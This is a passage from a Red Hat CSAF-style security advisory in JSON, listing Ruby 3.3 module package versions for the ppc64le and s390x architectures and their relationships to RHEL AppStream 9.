"name": "rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product": {
"name": "rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3)",
"product_id": "rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-racc@1.7.3-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=ppc64le\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product": {
"name": "rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3)",
"product_id": "rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-racc-debuginfo@1.7.3-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=ppc64le\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product": {
"name": "rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3)",
"product_id": "rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rbs@3.4.0-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=ppc64le\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product": {
"name": "rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3)",
"product_id": "rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rbs-debuginfo@3.4.0-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=ppc64le\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product": {
"name": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3)",
"product_id": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=s390x\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product": {
"name": "ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3)",
"product_id": "ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-bundled-gems@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=s390x\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product": {
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3)",
"product_id": "ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-bundled-gems-debuginfo@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=s390x\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product": {
"name": "ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3)",
"product_id": "ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-debuginfo@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=s390x\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product": {
"name": "ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3)",
"product_id": "ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-debugsource@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=s390x\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product": {
"name": "ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3)",
"product_id": "ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-devel@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=s390x\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product": {
"name": "ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3)",
"product_id": "ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-libs@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=s390x\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product": {
"name": "ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3)",
"product_id": "ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-libs-debuginfo@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=s390x\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product": {
"name": "rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3)",
"product_id": "rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bigdecimal@3.1.5-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=s390x\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product": {
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3)",
"product_id": "rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bigdecimal-debuginfo@3.1.5-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=s390x\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product": {
"name": "rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3)",
"product_id": "rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-io-console@0.7.1-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=s390x\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product": {
"name": "rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3)",
"product_id": "rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-io-console-debuginfo@0.7.1-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=s390x\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product": {
"name": "rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3)",
"product_id": "rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-json@2.7.2-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=s390x\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product": {
"name": "rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3)",
"product_id": "rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-json-debuginfo@2.7.2-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=s390x\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"product": {
"name": "rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x (ruby:3.3)",
"product_id": "rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-mysql2@0.5.5-3.module%2Bel9.7.0%2B24119%2Bccc80daf?arch=s390x\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"product": {
"name": "rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x (ruby:3.3)",
"product_id": "rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-mysql2-debuginfo@0.5.5-3.module%2Bel9.7.0%2B24119%2Bccc80daf?arch=s390x\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"product": {
"name": "rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x (ruby:3.3)",
"product_id": "rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-mysql2-debugsource@0.5.5-3.module%2Bel9.7.0%2B24119%2Bccc80daf?arch=s390x\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"product": {
"name": "rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x (ruby:3.3)",
"product_id": "rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-pg@1.5.4-2.module%2Bel9.7.0%2B24119%2Bccc80daf?arch=s390x\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"product": {
"name": "rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x (ruby:3.3)",
"product_id": "rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-pg-debuginfo@1.5.4-2.module%2Bel9.7.0%2B24119%2Bccc80daf?arch=s390x\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"product": {
"name": "rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x (ruby:3.3)",
"product_id": "rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-pg-debugsource@1.5.4-2.module%2Bel9.7.0%2B24119%2Bccc80daf?arch=s390x\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product": {
"name": "rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3)",
"product_id": "rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-psych@5.1.2-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=s390x\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product": {
"name": "rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3)",
"product_id": "rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-psych-debuginfo@5.1.2-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=s390x\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product": {
"name": "rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3)",
"product_id": "rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-racc@1.7.3-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=s390x\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product": {
"name": "rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3)",
"product_id": "rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-racc-debuginfo@1.7.3-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=s390x\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product": {
"name": "rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3)",
"product_id": "rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rbs@3.4.0-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=s390x\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product": {
"name": "rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3)",
"product_id": "rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rbs-debuginfo@3.4.0-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=s390x\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3"
},
"product_reference": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3"
},
"product_reference": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3"
},
"product_reference": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3"
},
"product_reference": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.src (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.src::ruby:3.3"
},
"product_reference": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.src::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3"
},
"product_reference": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3"
},
"product_reference": "ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3"
},
"product_reference": "ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3"
},
"product_reference": "ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3"
},
"product_reference": "ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3"
},
"product_reference": "ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3"
},
"product_reference": "ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3"
},
"product_reference": "ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3"
},
"product_reference": "ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3"
},
"product_reference": "ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3"
},
"product_reference": "ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3"
},
"product_reference": "ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3"
},
"product_reference": "ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3"
},
"product_reference": "ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3"
},
"product_reference": "ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3"
},
"product_reference": "ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
